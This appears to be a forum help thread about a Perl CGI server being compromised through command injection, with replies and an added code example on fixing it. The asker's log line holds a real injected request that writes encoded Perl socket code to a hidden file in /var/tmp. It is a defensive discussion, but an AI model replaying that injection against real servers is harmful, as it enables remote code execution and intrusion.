Perl being hacked

Hello,

I'm having a problem with one customer's server: someone found a way to make Perl run scripts on that server, and I do not know if that's a Perl bug or if there is something I can disable to make it stop... Here is the line from the log file:

65.7.178.227 - - [15/Apr/2006:03:33:53 -0400] "GET /cgi-bin/master.cgi?page=|perl%20-e%20%22print%20%5C%22%5C043%5C041%5C057%5C165%5C163%5C162%5C057%5C142%5C151%5C156%5C057%5C160%5C145%5C162%5C154%5C012%5C165%5C163%5C145%5C040%5C123%5C157%5C143%5C153%5C145%5C164%5C073%5C040%5C165%5C163%5C145%5C040%5C111%5C117%5C072%5C072%5C110%5C141%5C156%5C144%5C154%5C145%5C073%5C040%5C165%5C163%5C145%5C040%5C120%5C117%5C123%5C111%5C130%5C073%5C040%5C044%5C160%5C162%5C157%5C164%5C157%5C040%5C075%5C040%5C147%5C145%5C164%5C160%5C162%5C157%5C164%5C157%5C142%5C171%5C156%5C141%5C155%5C145%5C050%5C047%5C164%5C143%5C160%5C047%5C051%5C073%5C%22%22%20%3E/var/tmp/.mixed.2006| HTTP/1.1" 200 5

The file .mixed.2006 was there when I looked.

Thank you in advance
adcentrix Asked:
m1tk4 Commented:
This is a vulnerability in "master.cgi" - Perl by itself has nothing to do with it. Apparently, master.cgi does not do necessary checks for the safety of passed parameters and a request like this one makes it do something it's not supposed to do.

To make it stop you need to either disable or fix "master.cgi", your Perl is fine.

Unfortunately, I can't help you more without knowing what that master.cgi does.
pjedmond Commented:
This vulnerability could have been around for ages!:

http://seclists.org/lists/vuln-dev/2001/Jun/0006.html

June 2001?

It looks as if it is part of a link exchange system:

http://www.scriptgateway.com/scripts/cgiandperl/link_checking/s307492-link_master_v4_0.html

that is no longer supported.

Solution - get rid of the master.cgi script!

HTH:)
adcentrix Author Commented:
Thanks for the response, but this is happening with all the scripts on the server, it's not just this one... It's part of an ecommerce software that we developed under Perl... It's running on other servers without a problem...

I looked in the log and the impostor is able to run any command that the user NOBODY is able to run if connected to the console... just by adding a pipe | at the end of the script and after that the command that is supposed to be run by the server...

Thanks
adcentrix Author Commented:
Is there some type of command or instruction that I should add to the script to make it more secure? I only have the Perl location line and after that I start with my own code. Is that correct, or should it have something else?
adcentrix Author Commented:
Maybe there is a way to ignore anything after a pipe | that is sent on the URL? Does anyone know anything about that?
m1tk4 Commented:
>> Is there sometype of command or instruction that I should add to the script to make it more secure? I only have the perl location line and after that I start with my own code? is that correct or it should have something else?

I don't quite understand what you mean by "perl location line".

Your vulnerability is in your ecommerce software code, and it is similar to this one: http://www.kb.cert.org/vuls/id/496064, http://sans.org/resources/malwarefaq/guestbook.php (they provide ways to fix it too). If it happens to all your scripts on the server, they all have the same problem. Even if you did something on the other server to protect yourself from this (and you can do it by doing a URL rewrite detecting the presence of | characters in the request), your real problem is your code in the ecommerce suite you are talking about, and you still need to fix it.
m1tk4 Commented:
>>Maybe there is a way to ignore anything after a pipe | that is sent on the URL? Anyone knows anything about that?

If it's Apache, you can use mod_rewrite to detect and block that - see http://httpd.apache.org/docs/2.0/misc/rewriteguide.html
adcentrix Author Commented:
It's an Apache version 1.3.33 and the script has the open function in it...

That's nice, but do you know how to use this command? And where should I add the command in the httpd.conf?

Is this correct?
RedirectMatch ^|$ http://www.google.com/

Thank you very much for your help...

m1tk4 Commented:
No, something like this:

RewriteRule (.*)\|(.*) / [forbidden]

| is a special character in regexp and needs to be escaped.
m1tk4 Commented:
You can add it pretty much anywhere, .htaccess, <VirtualHost> container, <Directory> - it all depends on how your web server configuration is structured. Don't forget to add RewriteEngine on before it. See http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewriterule for detailed info on all rewrites.
adcentrix Author Commented:
I tried to add it to the .htaccess and the <Directory> but it does not affect the problem... it still accepts the command and does not forward to the forbidden page.

Any suggestion?
m1tk4 Commented:
RewriteRule (.*)\|(.*) / [forbidden,qsappend]

Sorry, missed that one. Before you try it, try just requesting something like /blabla|.htm to see if you placed it in the right container.

By default RewriteRule doesn't parse the query strings.

Again, you still should fix your software, because mod_rewrite only lets you control GET requests, but POST requests may still circumvent this.
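The root cause m1tk4 keeps pointing at is the Perl two-argument open() that the author mentions the script uses: with `open(FH, $page)`, a parameter value that begins or ends with `|` is treated as a command to pipe to or from, so the web server user ends up running whatever follows it. The example below is added here and is not code from the thread or from the author's ecommerce suite; the page directory `/var/www/pages`, the function names and the sample parameter values are assumptions. It shows the fix a script needs regardless of any mod_rewrite rule (and which also covers POST requests): validate the parameter against an allow-list and open it with the three-argument form and a fixed read mode.

```perl
#!/usr/bin/perl
# Added example (not from the thread): opening a file named by a request
# parameter so that a value like "|perl -e ..." can never start a command.
# In production the script should also run under taint mode (-T); the
# allow-list capture below is what untaints the value in that mode.
use strict;
use warnings;

# Hypothetical directory holding the only pages the script may serve.
my $PAGE_DIR = '/var/www/pages';

# Allow-list the "page" name instead of trying to strip bad characters.
# Letters, digits, underscore, dash and dot only; no slashes, no leading dot,
# so "|cmd", "cmd|" and "../" are all rejected before open() is reached.
sub clean_page_name {
    my ($raw) = @_;
    return undef unless defined $raw;
    return $1 if $raw =~ /\A([A-Za-z0-9_-][A-Za-z0-9_.-]{0,63})\z/;
    return undef;
}

# The vulnerable pattern from the thread looks like this (do NOT use it):
#     open(PAGE, $page);     # two-arg open: a leading or trailing "|" pipes to a command
# Three-argument open() with an explicit '<' mode treats the name as a file only.
sub read_page {
    my ($raw) = @_;
    my $name = clean_page_name($raw);
    return (0, "invalid page name") unless defined $name;

    my $path = "$PAGE_DIR/$name";
    open(my $fh, '<', $path) or return (0, "cannot open $name: $!");
    local $/;                          # slurp the whole file
    my $body = <$fh>;
    close $fh;
    return (1, $body);
}

# Constructed request values: the first mimics the percent-decoded shape of the
# log line in the question (command elided), the second is a legitimate page.
my @samples = ('|perl -e "..." >/var/tmp/.mixed.2006|', 'index.html');
for my $value (@samples) {
    my ($ok, $result) = read_page($value);
    printf "%-45s => %s\n", $value, ($ok ? "opened" : "rejected ($result)");
}
```

Run it as `perl safe_open.pl`: the first sample is rejected by clean_page_name() without open() ever being called, while `index.html` is opened only if that file exists under the page directory. In a real CGI the raw value would come from the request (for example CGI.pm's `param('page')`), and the same allow-list check applies to every parameter that ends up in open(), system() or backticks.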

adcentrix Author Commented:
Thank you very much m1tk4
It worked, I also fixed the problem on our software...

Have a nice weekend...